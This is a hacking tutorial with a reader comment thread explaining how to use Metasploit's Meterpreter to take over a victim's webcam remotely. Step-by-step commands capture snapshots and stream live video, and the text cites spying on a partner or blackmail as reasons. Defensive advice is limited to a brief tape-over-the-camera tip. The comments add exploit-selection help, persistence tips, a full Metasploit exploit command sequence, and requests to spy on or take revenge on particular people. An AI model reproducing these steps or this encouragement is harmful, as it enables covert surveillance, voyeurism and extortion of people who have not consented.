Welcome back, my hacker novitiates!
Like in my last article on remotely installing a keylogger onto somebody's computer, this guide will continue to display the abilities of Metasploit's powerful Meterpreter by hacking into the victim's webcam. This will allow us to control the webcam remotely, capturing snapshots from it.
Why exactly would you want to hack into somebody's webcam? Maybe you suspect your significant other of having a fling. Or, maybe you're into blackmailing. Or, maybe you're just a creep. But the real purpose is to show just how easy it is, so you're aware that it can be done—and so you can protect yourself against it.
Unlike just installing a command shell on the victim computer, the Meterpreter has the power to do numerous and nearly unlimited things on the target's computer. The key is to get the Meterpreter installed on their system first.
I've shown how to do this in some of my previous articles, where you could get the victim to click on a link to our malicious website, send a malicious Microsoft Office document or Adobe Acrobat file, and more.
So, now let's fire up Metasploit and install Meterpreter on the victim's system. Once we have done that, we can then begin to view and capture images from their webcam.
Step 1: List the Victim's Webcams
Metasploit's Meterpreter has a built-in module for controlling the remote system's webcam. The first thing we need to do is to check if there is a web cam, and if there is, get its name. We can do that by typing:
meterpreter > webcam_list
If he/she has a webcam, the system will come back with a list of all the webcams.
Step 2: Snap Pictures from the Victim's Webcam
Now that we know he/she has a webcam, we can take a snapshot from the webcam by typing:
meterpreter > webcam_snap
The system will now save a snapshot from her webcam onto our system in the directory /opt/framework3/msf3, which we can open and see what's going on.
The quality of the image saved all depends on your victim's webcam and surroundings.
Step 3: Watch Streaming Video from the Victim's Webcam
Now that we know how to capture a single snapshot from the victim's webcam, we will now want to run the webcam so that we can watch a continuous video stream. We can do this by typing;
meterpreter > run webcam -p /var/www
This command starts his/her webcam and sends its streaming output to /var/www/webcam.htm.
How to Protect Yourself from Webcam Intrusion
So, what can you do to make sure no one is peeking in on your habits in front of the computer? The easiest solution—cover your webcam up. Some laptops with built-in webcams actually have a slide cover you can use.
If that's not the case, a piece of non-translucent tape should to the trick, unless you want to buy one of these or these things. And if you still have one of those old-school USB webcams, simply unplug it.
We will continue to explore fun ways we can use the Meterpreter in the near future, so make sure to come back for more!
Just updated your iPhone? You'll find new emoji, enhanced security, podcast transcripts, Apple Cash virtual numbers, and other useful features. There are even new additions hidden within Safari. Find out what's new and changed on your iPhone with the iOS 17.4 update.
63 Comments
Also, whenever a webcam is activated the LED will be lighted on.
Please don't spread false information.
there is no led light on my laptop next to the camera
Yeah, not all webcams or video cameras have indicator lights.
awesome
but this hack is out of ....
the pc keep telling me "unreachable", and i tried to exploit three diferent computers, what to do?
Eduardo:
First, check to see if you can ping those computers. Also, what are the OS's of those machines?
OTW
There are a lot of penetration programs such as this gives validity admin I discovered by accident in my own computer And the removal of Trojan
It relies on encryption in order not to reveal Anti virus
Sorry where did you type ( meterpreter > webcam_list )
i'm using backtrack and i tried to exploit a windows 8 and a windows 7 but metasploit keep saying me "unreachable", i think that's something to do with the "service port" or something like that, the default is 445, do i need to change it?
Eduardo:
The first you need to do is ping the victim machine. Then you need to select an exploit based upon the victim's configuration. Every exploit is unique to the OS, the open ports, the running services, the applications running, etc. You get this info through good recon.
This particular exploit is for Windows XP or 2003 with port 445 open and RPC running.
OTW
so how i know what exploit use on a windows 7 and the port to set? i think that using the ip address on software like nmap tells me the information i need to know, but i don't what to do with that information
thanks for helping
There are a number of exploits that work with 7. Both the Word and PDF exploits work with 7.
I will soon be running some new Metasploit hacks that work with 7, so keep coming back.
OTW
can anybody see look threw the webcam or only people who have the webcam name?
hi
hai
is that only with the LAN IP??? or can i try with the host ip???
Gimi:
It will work with nearly any IP.
OTW
I've heard a lot about backtrack in the last couple of years. I think I will give it a try and dual boot it with Ubuntu :)
Lucas:
Welcome to Null Byte!
I'm glad you are going to give BackTrack a try!
OTW
I just stumbled across your website/blogs tonight... the imformatiom you guys hold understand and know is amazing....I am so very interested to learn this now!
Have a nice day/evening where every you are and give a good pat on the back for being legends
Mind blowing!
??
i want to be your student..please accept me
first of all
your posts are great i've learnt many techniques from it
i was successful in opening the webcam but meterpreter session is not appearing again(waited till 1 hour)
i am trying this on my another laptop
whats the problem(using kali liux)
can u help me?????
and thanks in advance
Several things could be the problem. If the other system was shutdown, then the meterpreter is gone.
Once the victim reboots the system, the meterpreter is lost. You need to create a persistent connection. See my tutorial of creating a persistent connection.
Wich exploit do you use? the same ass when you installed lisener?
Daniel:
It depends upon the system you are attacking. Exploits are OS, services, ports, and application specific, so you need to do your reconnaissance first and then select the appropriate exploit.
OTW
i am attacking a computer windows, and if i use the word exploit its for lisener. can i still use same exploit for webcam hack? with the same explot?
hey buddy how u are attacking that window can u pleasse tell me
how do you change to meterpreter? if i get em to open meter preter
Daniel:
You need to spend some time here studying.
As I said, you need to reconnaissance to find out the OS, the services, the ports, the applications before you can choose an attack. I have several posts here on using nmap, hping, xprobe2 and others for recon.
You can't change to the meterpreter, you choose the meterpreter as a payload.
OTW
""" can we hack any window password in less then a5 minutes , if u know then please tell me """
Yes, check on my tutorials on password cracking.
how I get IP adress of somebody else?
How to find IP address.
Well, next problem:
Whatever I type in, it's showing me:
Unknown command: ls
Unknown command: webcamlist
I think you understand
Archibald:
You aren't giving us much information to go on. Are you getting those messages in a terminal, in msfconsole, in the meterpreter? Can you send a screenshot?
I started a Meterpreter session on an android device.
Did you use the Windows meterpreter or the android meterpreter?
$wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
$chmod +x metasploit-latest-linux-x64-installer.run
.$/metasploit-latest-linux-x64-installer.run
sudo msfpro
use multi/browser/javasignedapplet
set SRVPORT 1589
set URIPATH /
exploit
192.168.40.198:1589
sessions -i 1
webcamlist
Hi, I got Kali Linux running on my PC. I have successfully connected to my Android device using meterpreter/metsploit following one of your other tutorials. I can run other commands such as webcamsnap but I cant run the live streaming command: run webcam. It gives me this error:
This version of Meterpreter is not supported with this Script!
Please help!
Edit: My OS is Kali Linux 1.0 32-bit.
Nightmare:
The error says it all. You can't run the webcam with that version of the meterpreter.
I tried searching Internet for some solution but couldn't find one. I tried updating Metasploit but couldn't(It said no updates available). Should I downgrade? Can you please give some link to solution. Which version will it work on?
The problem is that this script doesn't work with that meterpreter. Presently, there is no solution other than writing your own script. Are you up for it? The members of Null Byte would be eternally grateful, if you do.
Hello. Is it possible to do this from a PC to a Mac or Apple?
When you say, a PC, you mean a "PC" with Kali installed? Yes.
to @occupytheweb
So I'm a Noob.
But, here's a scenario I would love to see you take a "hack" at (pun intended)...
I'recently had a run in with a scammer on Skype which tried (unsuccesfully I might add) to blackmail me for money.
in MrRobot a hacker is able to take control of a remote computers webcam (you know whos). Now how would you go about getting access to that scammers camera if Skype is the only form of communication available to get access to the scammers camera and identity ?
infected photo sent through skype or is there some better elaborate ways to get back at them ?
Forget about him, if he didnt succeed you're better off staying away from those kind of people, or it might end up in a bad case of "ransomware".
I'm absolutely stoked you dudes are awesome. Im very noob. I am looking for a hand , I know my router is compromised , I am vpn and proxies , but I Really would sure not only to identify who is in my devices and router , but Web cam sounds like a absolutely fabulous idea an maybe after enough of that send a Trojan or some thing to , well I'd love to just knock whole system out but I'd think infiltrate them and only let them get back what I want them to. Sorry if this is out of line I'll delete if if can . Thanks
yeah i was wonderinghow do u do this on a ipad cause some jackass from kiwifar.ms made a trend about me and i wanted to hack into the owners webcam to get even but i use an ipad can anyone help
will this exploit work on windows 10?
Would love some help on how to make this work properly when both my computer and victim's computer are OS X/Mac. Is there a specific Meterpreter I need to use/download? Does one exploit work better than another for Mac/OS X? If so, what route would I take?
Thanks so much in advance!
My computer and iPod was stolen...Microsoft and Apple won't help...by hacking the camera maybe I can find my property...help
where I type this ( meterpreter > webcam_list ) ???
does anyone know how to take pictures through webcam snap command on all android infected in a single command on metasploit.?
That moment when you don't understand anything... 0-0
Only one problem: If the computer has a light next to the webcam, it will turn on and if the computer is running Windows 10, a huge box will appear in the corner of the screen saying: "Camera is ON".
OTW,
Hey OTW , How can I use this attack on a remote system situated on another LAN??
hey after wcry effect microsoft releases patches most of MS vulnarability codes are not working what we can do now for system hacking ,can u tell some vulnarability codes.......
Is this true????????
Share Your Thoughts